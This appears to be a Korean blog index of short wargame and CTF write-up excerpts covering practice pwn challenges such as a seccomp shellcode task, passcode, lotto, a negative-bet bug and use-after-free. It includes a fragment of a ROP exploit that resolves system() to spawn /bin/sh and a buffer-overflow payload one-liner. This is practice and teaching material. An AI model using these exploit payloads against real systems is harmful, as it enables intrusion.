본격 토들러 다풀고 롸업쓰기 얍 쉘코드 만드는 문제인감 #include #include #include #include #include #include #include #include #define LENGTH 128 void sandbox(){scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);if (ctx == NULL) {printf("seccomp error\n");exit(0);} seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_..
긁적 #include #include void login(){int passcode1;int passcode2; printf("enter passcode1 : ");scanf("%d", passcode1);fflush(stdin); // ha! mommy told me that 32bit is vulnerable to bruteforcing :)printf("enter passcode2 : "); scanf("%d", passcode2); printf("checking...\n");if(passcode1==338150 && passcode2==13371337){ printf("Login OK!\n"); system("/bin/cat flag"); } else{ printf("Login Failed!\n"..
아 로또맞고싶다 ㅁㄴㅇㄹ #include #include #include #include unsigned char submit[6]; void play(){int i;printf("Submit your 6 lotto bytes : ");fflush(stdout); int r;r = read(0, submit, 6); printf("Lotto Start!\n");//sleep(1); // generate lotto numbersint fd = open("/dev/urandom", O_RDONLY);if(fd==-1){printf("error. tell admin\n");exit(-1);}unsigned char lotto[6];if(read(fd, lotto, 6) != 6){printf("error2. ..
풀 때 가장 빨리 취약점 찾음;; 문제보면 nc로 연결하고 코드는 저 위에 있는데 코드 거어어어어어어업나 김 ㅠㅠ 고로 저도 링크로 남깁니다 코드 저기 코드에서 점수계산하는 부분 유심히보면 일케 되거든여? -bet에서 bet 받을때 - 안걸르면 거꾸로 + 되버리는거니까 저기를 찾아보니(하니) 안거름 ㅅㄱ링~ 와 나도 저런거 만들어 보고 싶다 111111111111111 -654321~~~ ?? 왜이김;;;; 다시 한번 한번 진걸로는 안되나봄,, 다시한번 y3s~~ 지는데 좋은건 처음이네; 끄읕
문제 ! 소스는 #include #include #include #include #include using namespace std; class Human{private:virtual void give_shell(){system("/bin/sh");}protected:int age;string name;public:virtual void introduce(){cout
ROP 1
문제이름이 저거인지는 몰라도 일단은 pwn200입니다 아마 200점 이겠죠...? pwn200
Rop를 연습한다면 한번씩 풀고 지나간다는 문제입니다 Ropasaurusrex Overwrite system to read_got pay += p32(read_plt)+"ABCD"+p32(bss) #read("ABCD", bss) => system(bss) => system("/bin/sh") print "Send Explot : %s" % pay p.send(pay) print "Send /bin/sh : %s" % binsh p.send(binsh) sleep(1) print "Reseving" tm = p.recv(4) print "Reseve Complete!" print "read_got : %x" % u32(tm) sys = u32(tm) - offset print "system : %x" %..
C0DE 는 이렇네여 분명 코드 자체는 LOB Redhat 1번 급인데 보호기법이 적용되니 장난아니게 빡세지는;; 일단 메모리 봐서 안변하는 부분을 overwrite할거니 찾아봐여 저기 동그라미 친데가 안변하는거 같으니 저기로! 저기 0x008cad3c 에 심볼릭 걸고 저기 전까지 retseld 로 밀어영 계획 귀찮으니 공격 ㄱ 아 그리고 execve로 하려 했는데 이상하게 안되서 execl 썼습니당 "`python -c 'print "A"*260 + "\x51\x84\x04\x08"*7 +"\x68\x2d\x83\x00"'`" 함수 주소 구하는거랑 심볼릭은 전에도 했으니 생략 y34h~!